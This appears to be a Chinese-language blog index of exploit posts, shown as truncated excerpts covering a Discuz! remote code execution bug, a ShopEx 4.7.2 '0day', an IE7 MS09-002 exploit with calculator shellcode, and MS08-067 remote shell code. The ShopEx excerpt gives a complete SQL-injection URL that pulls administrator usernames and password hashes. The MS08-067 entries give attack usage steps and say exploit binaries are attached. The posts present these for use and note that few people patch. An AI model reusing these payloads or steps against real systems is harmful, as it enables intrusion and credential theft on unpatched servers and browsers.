Jan 21

Discuz! 7.1 & 7.2 远程代码执行漏洞

Exploit               共有人观看过

 SSV ID:15198

...
Mar 4

ShopEx 4.7.2 0day

Exploit               共有人观看过

作者:无名

我是无名,这次写一个shopex4.7.2漏洞,

已经通知了官方,今天就发出来,

首先syssite/shopadmin/order_service.php后台这个文件没有验证用户身份,

重要的是$v_id参数没有过滤
 

syssite/shopadmin/order_service.php?m_id=1&key=986078fbe1474d61464d08535f1002a8&&v_id=1+and+1=2+union+select+concat(username,0x20,userpass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+sdb_mall_offer_operater%23
...
Feb 23

IE 7 MS09002 漏洞代码

Exploit               共有人观看过

这个是打开计算机的SHELLCODE ...基本上和各大GOOGLE找到的一样.会有卡和死IE的现像..大家帮一下不卡版吧...

 

<!--
MS09-002 Internet Exploere 7.0 Exploit
Modify by Friddy 2009.02.19 mail:qianyang@ssyeah.com
blog:www.friddy.cn
Tested under Windows XP sp2+IE 7.0
...

Oct 27

MS08-067 EXP出来了(= ='' 测试成功)

Exploit               共有人观看过

这个可说是另一个超强的洞了.基本上.只要知道对方的IP.就能取得SHELL了(说明是这样.太强了吧).而且配合近来MS的黑屏活动.应该都没什么人会更新MS补丁的了..

代码码就不贴出来了.反正贴了也没多少人会懂(包括我)..

附件中已有源码.和EXP程序..

 

使用方法....

...

Oct 24

MS Windows Server Service Code Execution PoC (MS08-067)

Exploit               共有人观看过

In vstudio command prompt:

mk.bat

next:

attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)

net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc

In some cases, /user:"" "", will suffice (i.e., anonymous connection)
...

  [«]1[»]